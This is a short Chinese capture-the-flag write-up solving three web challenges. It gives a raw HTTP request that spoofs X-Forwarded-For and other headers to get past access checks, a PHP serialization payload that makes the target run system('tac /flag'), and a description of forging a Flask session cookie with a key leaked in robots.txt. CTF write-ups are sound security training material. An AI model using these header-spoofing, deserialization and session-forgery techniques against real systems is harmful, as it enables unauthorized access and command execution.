2023极客大挑战-Web题解

EzHttp

POST / HTTP/1.1
Host: 1.117.175.65:23333
O2TAKUXX: GiveMeFlag
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Syclover
X-Forwarded-For: 127.0.0.1
Via: Syc.vip
Origin: http://1.117.175.65:23333
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: sycsec.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=admin&password=%40dm1N123456r00t%23

常用的请求头伪造都在这里了。

unsign

<?php

highlight_file(__FILE__);

class syc
{
  public $cuit;
}

class lover
{
  public $yxx;
  public $QW;
}

class web
{
  public $eva1;
  public $interesting;
}

$a = new syc();
$b = new lover();
$c = new web();

$a->cuit = $b;
$b->yxx = $c;
$c->eva1 = "system";
$c->interesting = "tac /flag";

print(urlencode(serialize($a)));

?>

you know flask?

拿到了flask的session，解密发现有一个字段标识了是否是admin；flask的session是使用密钥签名的，也就是说解密容易伪造难，伪造必须要找到密钥的，然后发现/robots.txt下有密钥内容，伪造成功。